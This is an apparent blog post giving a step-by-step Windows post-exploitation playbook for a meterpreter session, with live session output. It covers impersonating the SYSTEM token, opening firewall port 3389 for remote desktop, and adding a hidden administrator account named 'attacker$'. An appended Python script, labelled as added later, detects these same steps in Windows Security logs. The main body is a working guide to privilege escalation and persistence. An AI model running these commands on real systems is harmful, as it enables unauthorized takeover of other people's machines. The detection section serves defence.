What to do after obtaining a meterpreter session on Windows

Description                                                          Command
-------------------------------------------------------------------  ---------------------------------------------------------------------
Check the current user                                               getuid
If the account is low-privilege, first load the token module         use incognito
List session tokens                                                  list_tokens -u
Once a high-privilege account token is found, impersonate it         impersonate_token "NT AUTHORITY\SYSTEM"
Use this when the shell output is garbled                            chcp 65001
Get system information                                               systeminfo
Add a firewall rule allowing port 3389                               netsh firewall add portopening protocol = TCP port = 3389 name = rdp
Add a hidden user                                                    net user attacker$ 123456 /add
Add the user to the Administrators group                             net localgroup Administrators attacker$ /add
Check which users are currently logged on to the server              quser
meterpreter > getuid     ## get the current user
Server username: SIMONF0CB\simon
meterpreter > use incognito  ## load the token module
Loading extension incognito...Success.
meterpreter > list_tokens -u ## list session tokens
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
SIMONF0CB\simon

Impersonation Tokens Available
========================================
No tokens available

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" ## impersonate the SYSTEM token
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid ## token impersonated; we now hold the highest privilege (if the session only has administrator rights, getsystem can escalate further to SYSTEM)
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 4980 created.
Channel 5 created.
Microsoft Windows [�汾 10.0.18363.592]
(c) 2019 Microsoft Corporation����������Ȩ���� ## the output is garbled
C:\Windows\system32>chcp 65001 ## after this command the garbling is gone
chcp 65001
Active code page: 65001

C:\Windows\system32>systeminfo ## get system information via systeminfo
systeminfo

Host Name:                 SIMONF0CB
OS Name:                   Microsoft Windows 10 专业工作站版
OS Version:                10.0.18363 N/A Build 18363
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          simon


C:\Windows\system32>netsh firewall add portopening protocol = TCP port = 3389 name = rdp  ## add a firewall rule allowing port 3389 (for when 3389 on the target is not reachable)
netsh firewall add portopening protocol = TCP port = 3389 name = rdp

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .

Ok.

C:\Windows\system32>net user attacker$ 123456 /add ## add a hidden user
C:\Windows\system32>net localgroup Administrators attacker$ /add ## add the user just created to the Administrators group

C:\Windows\system32>quser ## check who is logged on to the server (so that logging in directly does not kick the administrator off)
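Added example, not part of the original post: a small Python triage routine that flags the three persistence and access steps shown above as they appear in the Windows Security log: user creation with a trailing `$` (event 4720), additions to the built-in Administrators group (event 4732), and netsh commands opening TCP/3389 (event 4688, which only carries the command line when command-line auditing is enabled). The event records below are constructed for the demo; the field names follow the Security log schema.

```python
import re

# Constructed sample Security events (not real logs) mirroring the commands in
# the transcript above, plus two benign events that must not trigger.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "attacker$", "SubjectUserName": "SYSTEM"},
    {"EventID": 4732, "TargetSid": "S-1-5-32-544",
     "MemberName": "SIMONF0CB\\attacker$", "SubjectUserName": "SYSTEM"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh firewall add portopening protocol = TCP port = 3389 name = rdp",
     "SubjectUserName": "SYSTEM"},
    {"EventID": 4720, "TargetUserName": "alice", "SubjectUserName": "helpdesk"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh interface show interface", "SubjectUserName": "simon"},
]

BUILTIN_ADMINS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators

# Matches both the deprecated "netsh firewall" syntax used in the transcript and
# the current "netsh advfirewall firewall" syntax the warning recommends.
RDP_RULE_RE = re.compile(
    r"netsh\s+(firewall\s+add\s+portopening.*port\s*=\s*3389"
    r"|advfirewall\s+firewall\s+add\s+rule.*localport\s*=\s*3389)", re.I)


def hidden_user_alerts(events):
    """Event 4720 (account created) whose name ends in '$' (hidden from `net user`)."""
    return [e["TargetUserName"] for e in events
            if e["EventID"] == 4720 and e["TargetUserName"].endswith("$")]


def admin_group_alerts(events):
    """Event 4732 (member added to a local group) targeting BUILTIN\\Administrators."""
    return [e["MemberName"] for e in events
            if e["EventID"] == 4732 and e["TargetSid"] == BUILTIN_ADMINS_SID]


def rdp_firewall_alerts(events):
    """Event 4688 (process creation) where netsh adds an inbound rule for TCP/3389."""
    return [e["CommandLine"] for e in events
            if e["EventID"] == 4688 and RDP_RULE_RE.search(e.get("CommandLine", ""))]


def triage(events):
    """Return (finding_type, detail) tuples for every suspicious event found."""
    findings = [("hidden_user_created", u) for u in hidden_user_alerts(events)]
    findings += [("added_to_administrators", m) for m in admin_group_alerts(events)]
    findings += [("rdp_port_opened", c) for c in rdp_firewall_alerts(events)]
    return findings


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_EVENTS):
        print(f"[!] {kind}: {detail}")
```

Feeding real events requires exporting the Security log (for example with `wevtutil` or `Get-WinEvent`) into the same dict shape; the 4688 check stays silent unless "Include command line in process creation events" is enabled.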

posted on 2021-05-18 10:03  tech_lee